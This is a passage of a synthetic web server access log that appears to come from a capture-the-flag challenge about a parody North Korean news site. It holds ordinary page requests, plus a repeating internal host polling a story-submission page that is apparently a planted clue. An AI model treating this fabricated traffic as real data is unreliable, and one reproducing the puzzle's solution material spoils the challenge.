/lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.0" 200 5252 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +35.130.54.58 - - [23/Jul/2020:11:17:58 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 9806 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +136.130.226.78 - - [23/Jul/2020:11:18:01 -0500] "GET / HTTP/1.1" 200 4819 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +234.146.45.63 - - [23/Jul/2020:11:18:04 -0500] "GET /quality-waterproof-liquid-made/ HTTP/1.1" 304 2463 "http://www.nkcna.ctf" "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" +203.232.215.64 - - [23/Jul/2020:11:18:06 -0500] "GET /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.0" 200 3818 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +80.89.167.53 - - [23/Jul/2020:11:18:08 -0500] "GET /tele-education-system-upgraded/ HTTP/1.1" 200 2309 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +91.222.116.117 - - [23/Jul/2020:11:18:10 -0500] "GET /new-mushroom-research-institute-inaugurated/ HTTP/1.1" 404 12051 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +82.235.41.17 - - [23/Jul/2020:11:18:11 -0500] "GET /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 3351 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +94.192.147.130 - - [23/Jul/2020:11:18:15 -0500] "POST /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 4028 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +253.8.29.42 - - [23/Jul/2020:11:18:16 -0500] "GET /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 13098 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +45.196.18.4 - - [23/Jul/2020:11:18:17 -0500] "GET /en/kim-jong-fun/ HTTP/1.1" 200 7741 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0" +192.168.51.66 - - [23/Jul/2020:11:18:20 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +149.158.129.161 - - [23/Jul/2020:11:18:20 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 400 12954 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +126.209.142.233 - - [23/Jul/2020:11:18:22 -0500] "POST /dancing-parties-held/ HTTP/1.1" 200 9850 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.17 (KHTML, like Gecko) Version/8.0.5 Safari/600.5.17" +120.89.222.123 - - [23/Jul/2020:11:18:23 -0500] "POST /sudoku/ HTTP/1.1" 200 12832 "http://www.google.ctf" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" +176.86.45.14 - - [23/Jul/2020:11:18:24 -0500] "GET /latest-rocket/ HTTP/1.1" 500 11057 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +156.183.62.250 - - [23/Jul/2020:11:18:26 -0500] "GET /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 11878 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +141.176.48.123 - - [23/Jul/2020:11:18:28 -0500] "GET /en/ HTTP/1.1" 301 12003 "-" "Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0" +233.15.12.212 - - [23/Jul/2020:11:18:32 -0500] "POST /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 6443 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0" +134.136.58.34 - - [23/Jul/2020:11:18:36 -0500] "GET /en/ HTTP/1.0" 200 6708 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +34.34.192.185 - - [23/Jul/2020:11:18:37 -0500] "GET /ryomyong-street-under-construction-in-pyongyang/ HTTP/1.1" 200 10528 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +139.8.18.83 - - [23/Jul/2020:11:18:40 -0500] "GET /en/latest-rocket/ HTTP/1.1" 304 3846 "http://www.yahoo.ctf" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" +15.148.6.218 - - [23/Jul/2020:11:18:41 -0500] "POST /en/pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 200 2520 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +228.240.57.123 - - [23/Jul/2020:11:18:44 -0500] "GET /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 6572 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +119.84.104.37 - - [23/Jul/2020:11:18:48 -0500] "GET /en/sudoku/ HTTP/1.1" 403 9057 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:18:50 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +11.132.35.151 - - [23/Jul/2020:11:18:52 -0500] "GET /en/new-books-published-in-dprk/ HTTP/1.1" 200 12859 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +211.210.141.7 - - [23/Jul/2020:11:18:56 -0500] "GET /new-medicine-developed-in-dprk/ HTTP/1.1" 200 13250 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +87.15.208.220 - - [23/Jul/2020:11:18:59 -0500] "GET /ultimate-technology/ HTTP/1.1" 200 3799 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0" +30.22.243.86 - - [23/Jul/2020:11:19:03 -0500] "GET / HTTP/1.1" 200 13971 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0" +173.140.50.227 - - [23/Jul/2020:11:19:04 -0500] "GET /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 6775 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)" +202.167.105.65 - - [23/Jul/2020:11:19:05 -0500] "POST /latest-rocket/ HTTP/1.1" 200 4914 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +187.59.237.53 - - [23/Jul/2020:11:19:06 -0500] "GET /en/ HTTP/1.1" 200 5859 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +11.79.226.24 - - [23/Jul/2020:11:19:07 -0500] "POST /en/fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 13041 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +73.123.75.47 - - [23/Jul/2020:11:19:09 -0500] "GET /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 6388 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" +38.181.180.43 - - [23/Jul/2020:11:19:12 -0500] "GET /kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 404 9665 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0" +221.170.91.231 - - [23/Jul/2020:11:19:13 -0500] "POST /en/phyongchon-pickle-factory/ HTTP/1.1" 200 10194 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0" +77.113.171.138 - - [23/Jul/2020:11:19:16 -0500] "POST /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 200 2482 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +220.201.186.221 - - [23/Jul/2020:11:19:20 -0500] "GET /phyongchon-pickle-factory/ HTTP/1.1" 200 9945 "-" "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" +192.168.51.66 - - [23/Jul/2020:11:19:20 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +113.66.107.233 - - [23/Jul/2020:11:19:24 -0500] "POST /en/floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 2784 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +89.204.177.152 - - [23/Jul/2020:11:19:26 -0500] "GET /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 200 14496 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +59.179.7.184 - - [23/Jul/2020:11:19:27 -0500] "POST /en/latest-rocket/ HTTP/1.1" 200 12179 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +17.114.169.4 - - [23/Jul/2020:11:19:30 -0500] "GET /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.0" 200 8221 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +100.73.111.20 - - [23/Jul/2020:11:19:33 -0500] "GET /en/ HTTP/1.1" 200 3840 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201" +122.9.195.137 - - [23/Jul/2020:11:19:35 -0500] "GET /phyongchon-pickle-factory/ HTTP/1.1" 200 3304 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +80.101.105.196 - - [23/Jul/2020:11:19:37 -0500] "GET /en/performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 200 13894 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:30.0) Gecko/20100101 Firefox/30.0" +195.199.93.163 - - [23/Jul/2020:11:19:39 -0500] "GET /en/tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 5091 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)" +125.17.177.206 - - [23/Jul/2020:11:19:40 -0500] "GET /kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 400 2671 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +146.75.107.43 - - [23/Jul/2020:11:19:42 -0500] "GET /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 14171 "http://www.foxnews.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:30.0) Gecko/20100101 Firefox/30.0" +214.228.60.137 - - [23/Jul/2020:11:19:46 -0500] "GET / HTTP/1.1" 200 4479 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +39.183.156.251 - - [23/Jul/2020:11:19:47 -0500] "GET /en/kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 400 6125 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +117.181.44.119 - - [23/Jul/2020:11:19:48 -0500] "POST /en/fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 6986 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +192.168.51.66 - - [23/Jul/2020:11:19:50 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +46.1.237.248 - - [23/Jul/2020:11:19:52 -0500] "POST /en/floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 5444 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +211.135.141.213 - - [23/Jul/2020:11:19:56 -0500] "GET /en/kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 304 13637 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0" +69.109.46.122 - - [23/Jul/2020:11:19:57 -0500] "GET /en/north-kiringul-air-force/ HTTP/1.1" 200 4992 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0" +230.93.58.252 - - [23/Jul/2020:11:19:59 -0500] "GET / HTTP/1.1" 200 10047 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +171.78.232.138 - - [23/Jul/2020:11:20:00 -0500] "GET /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 4804 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0" +235.31.42.41 - - [23/Jul/2020:11:20:03 -0500] "GET /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 8548 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +170.204.213.52 - - [23/Jul/2020:11:20:07 -0500] "GET /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.0" 200 6734 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0" +106.35.7.86 - - [23/Jul/2020:11:20:11 -0500] "GET /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 200 4983 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +193.230.84.160 - - [23/Jul/2020:11:20:15 -0500] "GET /en/kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.0" 200 4180 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53" +140.2.145.109 - - [23/Jul/2020:11:20:17 -0500] "POST /phyongchon-pickle-factory/ HTTP/1.1" 200 8908 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53" +35.104.42.132 - - [23/Jul/2020:11:20:20 -0500] "POST /deep-pan-or-classic/ HTTP/1.1" 200 6926 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +192.168.51.66 - - [23/Jul/2020:11:20:20 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +240.15.17.55 - - [23/Jul/2020:11:20:22 -0500] "GET /en/mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 12460 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +138.156.222.96 - - [23/Jul/2020:11:20:26 -0500] "GET /latest-rocket/ HTTP/1.1" 200 7194 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +224.217.228.229 - - [23/Jul/2020:11:20:30 -0500] "GET /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 4223 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +252.158.201.101 - - [23/Jul/2020:11:20:34 -0500] "POST /en/2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 200 7064 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +153.111.245.196 - - [23/Jul/2020:11:20:36 -0500] "GET /ryomyong-street-under-construction-in-pyongyang/ HTTP/1.1" 400 5037 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:30.0) Gecko/20100101 Firefox/30.0" +64.178.254.44 - - [23/Jul/2020:11:20:40 -0500] "GET /us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 403 2544 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +158.48.53.212 - - [23/Jul/2020:11:20:43 -0500] "POST /en/deep-pan-or-classic/ HTTP/1.1" 200 13758 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36" +108.184.186.7 - - [23/Jul/2020:11:20:46 -0500] "GET /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 13387 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +141.246.66.50 - - [23/Jul/2020:11:20:49 -0500] "POST /en/ HTTP/1.1" 200 6581 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:20:50 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +54.238.65.78 - - [23/Jul/2020:11:20:53 -0500] "GET /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 500 5198 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +210.34.201.193 - - [23/Jul/2020:11:20:54 -0500] "GET / HTTP/1.1" 200 4079 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +86.190.162.219 - - [23/Jul/2020:11:20:56 -0500] "POST /nanotechnology-exhibition-in-dprk/ HTTP/1.1" 200 7305 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" +215.165.87.57 - - [23/Jul/2020:11:21:00 -0500] "POST / HTTP/1.0" 200 5778 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" +118.75.144.134 - - [23/Jul/2020:11:21:02 -0500] "GET /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 8490 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +48.69.99.76 - - [23/Jul/2020:11:21:05 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 9117 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +3.36.6.190 - - [23/Jul/2020:11:21:08 -0500] "GET /99-problems/ HTTP/1.1" 200 6449 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +78.116.65.25 - - [23/Jul/2020:11:21:09 -0500] "POST /kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 200 14058 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +145.16.255.247 - - [23/Jul/2020:11:21:12 -0500] "GET /many-medical-scientific-achievements-made/ HTTP/1.0" 200 12827 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +213.97.180.31 - - [23/Jul/2020:11:21:14 -0500] "GET /en/kumdang-2-injection-manufactured/ HTTP/1.1" 200 4782 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +195.24.180.184 - - [23/Jul/2020:11:21:18 -0500] "POST /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 12419 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +23.207.128.122 - - [23/Jul/2020:11:21:19 -0500] "GET /new-mushroom-research-institute-inaugurated/ HTTP/1.1" 200 8205 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +36.11.190.107 - - [23/Jul/2020:11:21:21 -0500] "GET /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.0" 404 9571 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" +232.214.241.29 - - [23/Jul/2020:11:21:25 -0500] "POST /pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 200 13908 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806" +214.252.174.177 - - [23/Jul/2020:11:21:27 -0500] "GET / HTTP/1.1" 200 3596 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)" +143.87.204.93 - - [23/Jul/2020:11:21:28 -0500] "GET /99-problems/ HTTP/1.1" 200 6922 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +102.9.45.3 - - [23/Jul/2020:11:21:30 -0500] "POST /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 3099 "http://www.nkcna.ctf" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25" +68.96.142.125 - - [23/Jul/2020:11:21:33 -0500] "GET /phyongchon-pickle-factory/ HTTP/1.1" 200 7562 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +83.37.73.65 - - [23/Jul/2020:11:21:34 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 403 5557 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:30.0) Gecko/20100101 Firefox/30.0" +216.181.243.44 - - [23/Jul/2020:11:21:38 -0500] "GET /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 304 2393 "http://www.yahoo.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/55.0.2883.87 Chrome/55.0.2883.87 Safari/537.36" +229.143.177.27 - - [23/Jul/2020:11:21:42 -0500] "POST /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 304 2240 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +43.77.183.119 - - [23/Jul/2020:11:21:43 -0500] "POST /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 11140 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +194.183.140.127 - - [23/Jul/2020:11:21:47 -0500] "POST / HTTP/1.1" 200 3392 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:21:51 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +156.71.248.48 - - [23/Jul/2020:11:21:51 -0500] "POST /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 11652 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +197.102.133.123 - - [23/Jul/2020:11:21:52 -0500] "GET /en/phyongchon-pickle-factory/ HTTP/1.1" 404 6313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +207.164.104.171 - - [23/Jul/2020:11:21:54 -0500] "POST /kim-jong-fun/ HTTP/1.1" 403 6303 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" +16.46.161.179 - - [23/Jul/2020:11:21:56 -0500] "POST / HTTP/1.1" 404 11427 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +98.140.197.17 - - [23/Jul/2020:11:22:00 -0500] "GET /nanotechnology-exhibition-in-dprk/ HTTP/1.0" 400 2225 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +38.184.190.125 - - [23/Jul/2020:11:22:04 -0500] "POST /ultimate-technology/ HTTP/1.1" 403 2576 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +173.189.207.118 - - [23/Jul/2020:11:22:05 